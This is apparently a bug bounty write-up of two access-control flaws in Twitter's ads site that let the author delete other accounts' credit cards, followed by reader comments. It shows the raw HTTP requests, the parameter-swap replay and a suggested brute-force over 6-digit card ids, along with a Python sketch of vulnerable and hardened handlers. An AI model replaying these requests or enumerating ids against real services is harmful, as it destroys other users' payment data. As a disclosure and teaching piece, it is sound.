Hello everyone
Today I will write about a serious vulnerability I found recently in Twitter.
So let me share the story with you.
The story started when I saw Twitter introducing their new bug bounty program and starting to pay monetary rewards; I decided to look for new bugs in Twitter and get paid.
At the start of hunting I successfully found a CSRF vulnerability that could add many followers in a single request and bypass the CSRF token protection, but unfortunately it was a duplicate issue.
I started looking again for more critical bugs and found a serious logical vulnerability [insecure direct object reference] in ads.twitter.com that allowed me to delete credit cards from any Twitter account.
The impact of the vulnerability was very critical and high, because all that is needed to delete a credit card is the credit card identifier, which consists of only 6 digits, such as “220152”.
So imagine a blackhat hacker who could write a simple Python script with a simple for loop over 6-digit numbers: he could delete all credit cards from all Twitter accounts, which would halt all Twitter ads campaigns and incur a big financial loss for Twitter.
So what was the vulnerability and where did it exist?
Actually I found two vulnerabilities, not one, but both had the same effect and impact.
# First Vulnerability
The first vulnerability I spotted was in the delete functionality for credit cards on the payment methods page:
https://ads.twitter.com/accounts/[account id]/payment_methods
When I chose to delete a credit card and pressed the delete button,
an AJAX POST request was sent to the server like the following:
POST /accounts/18ce53wqoxd/payment_methods/destroy HTTP/1.1
Host: ads.twitter.com
Connection: keep-alive
Content-Length: 29
Accept: */*
Origin: https://ads.twitter.com
X-CSRF-Token: Lb6HONDceN5mGvAEUvCQNakJUspD60Odumz/trVdQfE=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://ads.twitter.com/accounts/18ce53wqoxd/payment_methods
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: [cookies here]
account=18ce53wqoxd&id=219643
There are only two POST parameters sent in the request body:
account: the Twitter ads account id
id: the credit card id, which is numeric, without any alphabetic characters
All I had to do was change those two parameters to the account id and credit card id of my other Twitter account, then replay the request, and I found that the credit card had been deleted from the other Twitter account without any interaction required.
The funny part is that the response was “403 Forbidden”, but the credit card was actually deleted from the account.
# Second Vulnerability
I found another similar vulnerability, but this time the impact was higher than the previous one.
When I tried to add an invalid credit card to my Twitter account it displayed an error message,
“we were unable to approve the card you entered”, and showed a button called “Dismiss”.
When I pressed the Dismiss button the credit card disappeared from my account, so I thought it had the same effect as deleting. I tried to add an invalid credit card again and intercepted the request, which looks like the following:
POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152 HTTP/1.1
Host: ads.twitter.com
Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://ads.twitter.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://ads.twitter.com/accounts/18ce53wqoxd/payment_methods
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: [Cookies Here]
utf8=%E2%9C%93&authenticity_token=Lb6HONDceN5mGvAEUvCQNakJUspD60Odumz%2FtrVdQfE%3D&id=220152&dismiss=Dismiss
This time the account parameter does not exist and only the credit card id is used.
So I changed the id in the URL and body to the credit card id from my other Twitter account, then replayed the request, and guess what?
The credit card got deleted from the other Twitter account.
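As an added example (not Twitter's code, which is not public), here is the shape of both handlers as plain Python over an in-memory store, each in the vulnerable form described above and then hardened so that every lookup is scoped to an ads account the session user administers, checked before any side effect. The account id and card ids are the ones from the requests above; the users alice and mallory and the ownership table are constructed.

```python
# Added example, not Twitter's code: both delete paths from the post, modelled
# as plain functions over an in-memory store, vulnerable shape then hardened.

# Constructed: card id -> ads account that owns it (ids taken from the post)
CARDS = {219643: "18ce53wqoxd", 220152: "18ce7other0"}
# Constructed: ads accounts each logged-in user is allowed to administer
ACCOUNT_ADMINS = {"alice": {"18ce53wqoxd"}, "mallory": {"18ce99mallory"}}

def administers(session_user, account):
    return account in ACCOUNT_ADMINS.get(session_user, set())

def destroy_vulnerable(cards, session_user, account, card_id):
    """First bug: 'account' and 'id' both come from the request body and nothing
    ties either to session_user, so any caller can delete any card id."""
    if card_id not in cards:
        return 404
    del cards[card_id]
    return 200

def handle_failed_vulnerable(cards, session_user, card_id):
    """Second bug: no account parameter at all; the id in the URL is all that counts."""
    cards.pop(card_id, None)
    return 200

def destroy_hardened(cards, session_user, account, card_id):
    """Authorise first, then act: the caller must administer the account named
    in the request, and the card must belong to that same account."""
    if not administers(session_user, account):
        return 403
    if cards.get(card_id) != account:
        return 404  # a card outside the caller's account looks nonexistent
    del cards[card_id]
    return 200

def handle_failed_hardened(cards, session_user, card_id):
    """No account in the request: derive it from the card, then require admin."""
    account = cards.get(card_id)
    if account is None or not administers(session_user, account):
        return 404
    del cards[card_id]
    return 200

def replay_from_post():
    """Replays the post's cross-account step against both shapes: a user who
    administers no part of account 18ce53wqoxd submits its id and card 219643."""
    vuln, hard = dict(CARDS), dict(CARDS)
    v = destroy_vulnerable(vuln, "mallory", "18ce53wqoxd", 219643)
    h = destroy_hardened(hard, "mallory", "18ce53wqoxd", 219643)
    return (v, 219643 in vuln), (h, 219643 in hard)
```

`replay_from_post()` returns `((200, False), (403, True))`: the vulnerable handler deletes the card, the hardened one refuses and the card survives.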
For more info you can check the following video demonstration of the vulnerability.
Twitter triaged and fixed the vulnerability within 2 days, and I got the highest reward in the Twitter bug bounty program till now.
That’s very impressive!
Such a bug is affecting Twitter’s business model directly
Nice catch bro
Thanks my dear friend :))
Good Job bro
Thanks bro
Great
Keep Going I LIKE IT
Habibi Fouad, glad that you liked it
keep going wish you the best
Thanks ya Nasoof, I miss you bro
Great job
I only can say ……. wooooooooow
You are the boss
Thanks my dear friend
Nice one man , Hope they paid well :DD
Keep it up
Thanks a lot ya Faris, yes they paid a nice bounty
Wow, Nice Catch brother, keep it up. (2800$ = montage safa haha)
Nice finding bro
Congrats and keep it up
Great Job bro
Happy hunting
That is one heck of a vulnerability you found Ahmed Habibi
keep it up!
You have always been my teacher, Abo Elaa
as i told you @ twitter (You are awesome)
This is just Awesome, don't have words to say. (Y)
Good Job
Thanks for sharing, this is a fantastic blog. Really looking forward to reading more. Keep writing.
As Salaamu Aleikum Ahmed
How are you?
Okay, I am an 18 year old sensitive person.
I want to talk with you :'(.
You can contact me via mail or via my little secret but personal facebook profile: https://www.facebook.com/alio.riise
Very nice, came over to show some support.
Awesome finding (Y) Thumbs up
great job